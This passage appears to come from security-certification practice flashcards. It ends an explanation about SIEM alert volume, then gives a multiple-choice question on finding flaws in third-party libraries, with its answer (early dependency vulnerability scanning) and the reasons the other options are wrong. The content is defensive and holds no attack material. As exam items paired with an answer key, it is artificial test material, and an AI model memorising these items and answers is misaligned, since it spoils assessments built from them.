Disable email alerting and review the SIEM directly: This action only changes the method of alert notification and does not solve the problem of high alert volume or distinguishing between normal and malicious logins.
Adjust the sensitivity levels of the SIEM correlation engine: This might reduce the number of alerts, but it can also lead to missing important security events. It does not help in establishing what is normal behavior versus malicious activity.
50
Q

Which of the following is the MOST effective way to detect security flaws present on third-party libraries embedded on software before it is released into production?

a. Employ different techniques for server- and client-side validations
b. Use a different version control system for third-party libraries
c. Implement a vulnerability scan to assess dependencies earlier on SDLC
d. Increase the number of penetration tests before software release

A

c. Implement a vulnerability scan to assess dependencies earlier in the SDLC

Explanation:

Implement a vulnerability scan to assess dependencies earlier in the SDLC: This approach involves scanning the third-party libraries for known vulnerabilities as part of the software development lifecycle (SDLC). By integrating vulnerability scanning tools early and throughout the development process, developers can identify and address security flaws in third-party dependencies before the software is released into production.

Why not the others?:

Employ different techniques for server- and client-side validations: While important for overall security, this practice focuses on input validation and does not specifically target security flaws in third-party libraries.
Use a different version control system for third-party libraries: Changing the version control system does not inherently address the security flaws in the libraries. The key is to identify vulnerabilities in the libraries themselves, not how they are managed.
Increase the number of penetration tests before software release: Penetration testing is valuable but typically occurs later in the SDLC and might not be as effective in identifying specific vulnerabilities in third-party libraries. Additionally, penetration tests are time-consuming and may miss some embedded library vulnerabilities that a dedicated vulnerability scan could catch earlier.

By implementing vulnerability scans to assess dependencies early and throughout the SDLC, you can effectively identify and mitigate security flaws in third-party libraries before they affect production environments.